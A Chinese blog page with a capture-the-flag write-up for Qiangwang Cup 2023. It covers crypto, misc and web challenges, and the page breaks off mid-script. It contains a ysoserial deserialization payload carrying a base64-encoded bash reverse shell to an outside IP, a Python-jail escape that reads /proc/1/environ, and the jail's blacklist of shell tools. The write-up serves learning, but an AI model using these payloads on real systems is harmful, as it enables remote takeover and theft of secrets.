

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/url.jpg">
  <link rel="icon" href="/img/url.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="J_0k3r">
  <meta name="keywords" content="">
  
    <meta name="description" content="差不多冬至一早一晚还是有雨 -《葡萄成熟时》">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯2023 wp">
<meta property="og:url" content="http://example.com/2023/12/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2023/index.html">
<meta property="og:site_name" content="J_0k3r">
<meta property="og:description" content="差不多冬至一早一晚还是有雨 -《葡萄成熟时》">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/a10.jpg">
<meta property="article:published_time" content="2023-12-21T15:59:59.000Z">
<meta property="article:modified_time" content="2024-01-01T09:52:03.636Z">
<meta property="article:author" content="J_0k3r">
<meta property="article:tag" content="比赛Write Up">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/a10.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>强网杯2023 wp - J_0k3r</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":180,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"python"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"41fc030db57d5570dd22f78997dc4a7e","google":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":true},"gtag":null},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?41fc030db57d5570dd22f78997dc4a7e";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>J_0k3r的无人之境</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/playlist/" target="_self">
                <i class="iconfont icon-music"></i>
                <span>音乐</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/ptcss.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="强网杯2023 wp"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        J_0k3r
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-12-21 23:59" pubdate>
          2023年12月21日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          21 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">强网杯2023 wp</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="队伍信息"><a href="#队伍信息" class="headerlink" title="队伍信息"></a>队伍信息</h2><p><img src="/mdimg/qwb2023/1.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="happygame"><a href="#happygame" class="headerlink" title="happygame"></a>happygame</h3><p>发现是grpc服务<br>用postman的grpc模式发包<br>ysoserial生成cc7<br>反弹shell<br><img src="/mdimg/qwb2023/2.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-keyword">java </span>-<span class="hljs-keyword">jar </span>ysoserial.<span class="hljs-keyword">jar </span>CommonsCollections7 <span class="hljs-string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzguMTM1LjY3LzgwMDEgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span> <span class="hljs-title">|base64 -w0 &gt;2.txt</span><br></code></pre></td></tr></table></figure>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="discrete-log"><a href="#discrete-log" class="headerlink" title="discrete_log"></a>discrete_log</h3><h4 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> Crypto.Util.Padding <span class="hljs-keyword">import</span> pad<br>flag = <span class="hljs-string">&#x27;flag&#123;d3b07b0d416ebb&#125;&#x27;</span><br><br><span class="hljs-keyword">assert</span> <span class="hljs-built_in">len</span>(flag) &lt;= <span class="hljs-number">45</span><br><span class="hljs-keyword">assert</span> flag.startswith(<span class="hljs-string">&#x27;flag&#123;&#x27;</span>)<br><span class="hljs-keyword">assert</span> flag.endswith(<span class="hljs-string">&#x27;&#125;&#x27;</span>)<br><br>m = bytes_to_long(pad(flag.encode(), <span class="hljs-number">128</span>))<br><br>p = <span class="hljs-number">0xf6e82946a9e7657cebcd14018a314a33c48b80552169f3069923d49c301f8dbfc6a1ca82902fc99a9e8aff92cef927e8695baeba694ad79b309af3b6a190514cb6bfa98bbda651f9dc8f80d8490a47e8b7b22ba32dd5f24fd7ee058b4f6659726b9ac50c8a7f97c3c4a48f830bc2767a15c16fe28a9b9f4ca3949ab6eb2e53c3</span><br>g = <span class="hljs-number">5</span><br><br><span class="hljs-keyword">assert</span> m &lt; (p - <span class="hljs-number">1</span>)<br><br>c = <span class="hljs-built_in">pow</span>(g, m, p)<br><br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;out.txt&#x27;</span>, <span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;p = &#125;</span>&quot;</span>, file=f)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;g = &#125;</span>&quot;</span>, file=f)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;c = &#125;</span>&quot;</span>, file=f)<br></code></pre></td></tr></table></figure>
<h4 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h4><p>DLP问题，p=2q+1,一开始看这个p作为安全素数，怎么能分解，然后查到了几个帖子。<br><a target="_blank" rel="noopener" href="https://crypto.stackexchange.com/q/2990/109345">How can I solve the discrete logarithm modulo 2q+1 if I can solve it in the subgroup of order q?</a><br><a target="_blank" rel="noopener" href="https://crypto.stackexchange.com/q/46826/109345">On getting beyond LSB in discrete log</a><br>第一个告诉我们安全素数可以从Zp群降到Zq群，其实就是方便分解也没啥特别了。第二个贴说了一个 $r^{x}=hg^{-x_0}\bmod p$ 的办法，结合给出的</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-built_in">flag</span> = <span class="hljs-string">&#x27;flag&#123;d3b07b0d416ebb&#125;&#x27;</span><br><br><span class="hljs-built_in">assert</span> len(<span class="hljs-built_in">flag</span>) &lt;= <span class="hljs-number">45</span><br><span class="hljs-built_in">assert</span> <span class="hljs-built_in">flag</span>.startswith(<span class="hljs-string">&#x27;flag&#123;&#x27;</span>)<br><span class="hljs-built_in">assert</span> <span class="hljs-built_in">flag</span>.endswith(<span class="hljs-string">&#x27;&#125;&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>可以知道去掉flag头和flag尾，还有pad，字符串应该不大，选择大概在10~20左右进行爆破，(其实是一个一个试。。。就是中间人相遇的问题了，硬爆。</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">p</span> = <br>g = <span class="hljs-number">5</span><br><span class="hljs-keyword">c</span> = <br><br>q = (<span class="hljs-keyword">p</span> - <span class="hljs-number">1</span>) // <span class="hljs-number">2</span><br><br>from Crypto.Util.<span class="hljs-keyword">number</span> import *<br>from Crypto.Util.Padding import pad<br>from tqdm import tqdm<br>from itertools import product<br><br>i = <span class="hljs-number">12</span> # 调一次<span class="hljs-number">10</span>多分钟，不会多线程真麻了<br><br>tmpf = bytes_to_long(pad(<span class="hljs-keyword">b</span><span class="hljs-string">&#x27;flag&#123;&#x27;</span> + <span class="hljs-keyword">b</span><span class="hljs-string">&#x27;\x00&#x27;</span> * i + <span class="hljs-keyword">b</span><span class="hljs-string">&#x27;&#125;&#x27;</span>, <span class="hljs-number">128</span>))<br>lift = <span class="hljs-built_in">pow</span>(<span class="hljs-number">256</span>, (<span class="hljs-number">128</span> - i - <span class="hljs-built_in">len</span>(<span class="hljs-string">&#x27;flag&#123;&#125;&#x27;</span>) + <span class="hljs-number">1</span>))<br><span class="hljs-keyword">c</span>= <span class="hljs-keyword">c</span>* <span class="hljs-built_in">pow</span>(g, -tmpf, <span class="hljs-keyword">p</span>) % <span class="hljs-keyword">p</span><br><span class="hljs-keyword">c</span>= <span class="hljs-built_in">pow</span>(<span class="hljs-keyword">c</span>, inverse(lift, q), <span class="hljs-keyword">p</span>)<br><br>table = [hex(i)[<span class="hljs-number">2</span>:] <span class="hljs-keyword">for</span> i in <span class="hljs-built_in">range</span>(<span class="hljs-number">16</span>)]<br>dic = dict()<br>hg, <span class="hljs-keyword">lg</span> = <span class="hljs-built_in">pow</span>(g, <span class="hljs-number">256</span>**(i//<span class="hljs-number">2</span>), <span class="hljs-keyword">p</span>), g<br><br><span class="hljs-keyword">for</span> <span class="hljs-keyword">pre</span> in tqdm(product(table, <span class="hljs-built_in">repeat</span>=i//<span class="hljs-number">2</span>)):<br>    <span class="hljs-keyword">pre</span> = bytes_to_long(<span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-keyword">join</span>(<span class="hljs-keyword">pre</span>).encode())<br>    now = <span class="hljs-keyword">c</span>* <span class="hljs-built_in">pow</span>(hg, -<span class="hljs-keyword">pre</span>, <span class="hljs-keyword">p</span>) % <span class="hljs-keyword">p</span><br>    dic[now] = <span class="hljs-keyword">pre</span><br><br><span class="hljs-keyword">for</span> suf in tqdm(product(table, <span class="hljs-built_in">repeat</span>=i//<span class="hljs-number">2</span>)):<br>    suf = bytes_to_long(<span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-keyword">join</span>(suf).encode())<br>    now = <span class="hljs-built_in">pow</span>(<span class="hljs-keyword">lg</span>, suf, <span class="hljs-keyword">p</span>)<br>    <span class="hljs-keyword">if</span> now in dic:<br>        <span class="hljs-keyword">print</span>(dic[now])<br>        <span class="hljs-keyword">print</span>(suf)<br>        <span class="hljs-keyword">print</span>(<span class="hljs-keyword">b</span><span class="hljs-string">&#x27;flag&#123;&#x27;</span> + long_to_bytes(dic[now]) + long_to_bytes(suf) + <span class="hljs-keyword">b</span><span class="hljs-string">&#x27;&#125;&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>b’flag{61e8007dd65f}’</p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="谍影重重2-0"><a href="#谍影重重2-0" class="headerlink" title="谍影重重2.0"></a>谍影重重2.0</h3><h4 id="题目说明"><a href="#题目说明" class="headerlink" title="题目说明"></a>题目说明</h4><p>题目内容：<br>小明是某间谍组织的一员，他终日监听着我国某重点军事基地的飞行动态，妄图通过分析参数找到我国飞的最快的飞机。我国费尽千辛万苦抓住了他，并在他的电脑上找到了一段他监听的信息，请分析出这段信息中飞的最快的飞机。<br>格式为flag{md5(ICAO CODE of the fastest plane)}</p>
<h4 id="解题思路-1"><a href="#解题思路-1" class="headerlink" title="解题思路"></a>解题思路</h4><p>由提示知是飞机流量<br><code>https://mode-s.org/decode/content/ads-b/1-basics.html</code><br>导出有tcp.payload字段的流 为1.pcapng<br><img src="/mdimg/qwb2023/3.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">tshark -r 1.pcapng -T fields -e tcp.payload  | sed &#x27;s/1a33ffffffffffff.\&#123;2\&#125;//&#x27;  &gt; data.txt<br>sed &#x27;s/1a32ffffffffffff.\&#123;2\&#125;//&#x27; data.txt<br></code></pre></td></tr></table></figure>
<p>提取数据<br><code>pip install pyModeS</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pyModeS <span class="hljs-keyword">as</span> pms<br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;1.txt&#x27;</span>, <span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> file:<br>    lines = file.readlines()<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> lines:<br>    pms.tell(i)<br></code></pre></td></tr></table></figure>
<p><img src="/mdimg/qwb2023/4.png" srcset="/img/loading.gif" lazyload><br>ICAO 要大写</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">79A05E</span><br><span class="hljs-attribute">flag</span>&#123;<span class="hljs-number">4</span>cf6729b9bc05686a79c1620b0b1967b&#125;<br></code></pre></td></tr></table></figure>
<h3 id="Pyjail-It’s-myFILTER"><a href="#Pyjail-It’s-myFILTER" class="headerlink" title="Pyjail ! It’s myFILTER !!!"></a>Pyjail ! It’s myFILTER !!!</h3><h4 id="题目说明-1"><a href="#题目说明-1" class="headerlink" title="题目说明"></a>题目说明</h4><p>题目内容：<br>你能否能帮助她绕过filter呢？是时候拿出真本事！提示：本题需要一定的成功率，如果你认为你的payload能够工作，请多尝试几遍！</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> code, os, subprocess<br><span class="hljs-keyword">import</span> pty<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">blacklist_fun_callback</span>(<span class="hljs-params">*args</span>):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Player! It&#x27;s already banned!&quot;</span>)<br><br>pty.spawn = blacklist_fun_callback<br>os.system = blacklist_fun_callback<br>os.popen = blacklist_fun_callback<br>subprocess.Popen = blacklist_fun_callback<br>subprocess.call = blacklist_fun_callback<br>code.interact = blacklist_fun_callback<br>code.compile_command = blacklist_fun_callback<br><br><span class="hljs-built_in">vars</span> = blacklist_fun_callback<br>attr = blacklist_fun_callback<br><span class="hljs-built_in">dir</span> = blacklist_fun_callback<br><span class="hljs-built_in">getattr</span> = blacklist_fun_callback<br><span class="hljs-built_in">exec</span> = blacklist_fun_callback<br><span class="hljs-built_in">__import__</span> = blacklist_fun_callback<br><span class="hljs-built_in">compile</span> = blacklist_fun_callback<br><span class="hljs-built_in">breakpoint</span> = blacklist_fun_callback<br><br><span class="hljs-keyword">del</span> os, subprocess, code, pty, blacklist_fun_callback<br>input_code = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;Can u input your code to escape &gt; &quot;</span>)<br><br>blacklist_words = [<br>    <span class="hljs-string">&quot;subprocess&quot;</span>,<br>    <span class="hljs-string">&quot;os&quot;</span>,<br>    <span class="hljs-string">&quot;code&quot;</span>,<br>    <span class="hljs-string">&quot;interact&quot;</span>,<br>    <span class="hljs-string">&quot;pty&quot;</span>,<br>    <span class="hljs-string">&quot;pdb&quot;</span>,<br>    <span class="hljs-string">&quot;platform&quot;</span>,<br>    <span class="hljs-string">&quot;importlib&quot;</span>,<br>    <span class="hljs-string">&quot;timeit&quot;</span>,<br>    <span class="hljs-string">&quot;imp&quot;</span>,<br>    <span class="hljs-string">&quot;commands&quot;</span>,<br>    <span class="hljs-string">&quot;popen&quot;</span>,<br>    <span class="hljs-string">&quot;load_module&quot;</span>,<br>    <span class="hljs-string">&quot;spawn&quot;</span>,<br>    <span class="hljs-string">&quot;system&quot;</span>,<br>    <span class="hljs-string">&quot;/bin/sh&quot;</span>,<br>    <span class="hljs-string">&quot;/bin/bash&quot;</span>,<br>    <span class="hljs-string">&quot;flag&quot;</span>,<br>    <span class="hljs-string">&quot;eval&quot;</span>,<br>    <span class="hljs-string">&quot;exec&quot;</span>,<br>    <span class="hljs-string">&quot;compile&quot;</span>,<br>    <span class="hljs-string">&quot;input&quot;</span>,<br>    <span class="hljs-string">&quot;vars&quot;</span>,<br>    <span class="hljs-string">&quot;attr&quot;</span>,<br>    <span class="hljs-string">&quot;dir&quot;</span>,<br>    <span class="hljs-string">&quot;getattr&quot;</span><br>    <span class="hljs-string">&quot;__import__&quot;</span>,<br>    <span class="hljs-string">&quot;__builtins__&quot;</span>,<br>    <span class="hljs-string">&quot;__getattribute__&quot;</span>,<br>    <span class="hljs-string">&quot;__class__&quot;</span>,<br>    <span class="hljs-string">&quot;__base__&quot;</span>,<br>    <span class="hljs-string">&quot;__subclasses__&quot;</span>,<br>    <span class="hljs-string">&quot;__getitem__&quot;</span>,<br>    <span class="hljs-string">&quot;__self__&quot;</span>,<br>    <span class="hljs-string">&quot;__globals__&quot;</span>,<br>    <span class="hljs-string">&quot;__init__&quot;</span>,<br>    <span class="hljs-string">&quot;__name__&quot;</span>,<br>    <span class="hljs-string">&quot;__dict__&quot;</span>,<br>    <span class="hljs-string">&quot;._module&quot;</span>,<br>    <span class="hljs-string">&quot;builtins&quot;</span>,<br>    <span class="hljs-string">&quot;breakpoint&quot;</span>,<br>    <span class="hljs-string">&quot;import&quot;</span>,<br>]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">my_filter</span>(<span class="hljs-params">input_code</span>):<br>    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> blacklist_words:<br>        <span class="hljs-keyword">if</span> x <span class="hljs-keyword">in</span> input_code:<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br><br><span class="hljs-keyword">while</span> <span class="hljs-string">&#x27;&#123;&#x27;</span> <span class="hljs-keyword">in</span> input_code <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;&#125;&#x27;</span> <span class="hljs-keyword">in</span> input_code <span class="hljs-keyword">and</span> input_code.isascii() <span class="hljs-keyword">and</span> my_filter(input_code) <span class="hljs-keyword">and</span> <span class="hljs-string">&quot;eval&quot;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> input_code <span class="hljs-keyword">and</span> <span class="hljs-built_in">len</span>(input_code) &lt; <span class="hljs-number">65</span>:<br>    input_code = <span class="hljs-built_in">eval</span>(<span class="hljs-string">f&quot;f&#x27;<span class="hljs-subst">&#123;input_code&#125;</span>&#x27;&quot;</span>)<br><span class="hljs-keyword">else</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Player! Please obey the filter rules which I set!&quot;</span>)<br></code></pre></td></tr></table></figure>
<h4 id="解题思路-2"><a href="#解题思路-2" class="headerlink" title="解题思路"></a>解题思路</h4><p>限制了payload长度小于65<br>过滤了很多<br><code>Print</code> 和 <code>open</code>、<code>read</code> 没过滤，可以配合读文件并打印<br>读取当前进程的环境变量</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">&#123;print(open(<span class="hljs-string">&quot;/proc/1/environ&quot;</span>).read())&#125;<br></code></pre></td></tr></table></figure>
<p><img src="/mdimg/qwb2023/5.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="easyfuzz"><a href="#easyfuzz" class="headerlink" title="easyfuzz"></a>easyfuzz</h3><h4 id="解题思路-3"><a href="#解题思路-3" class="headerlink" title="解题思路"></a>解题思路</h4><p>一个个遍历9位字符<br>返回的0代表该位字符不对，1则代表该位字符正确</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> string<br><span class="hljs-keyword">import</span> os<br><br>context.log_level = <span 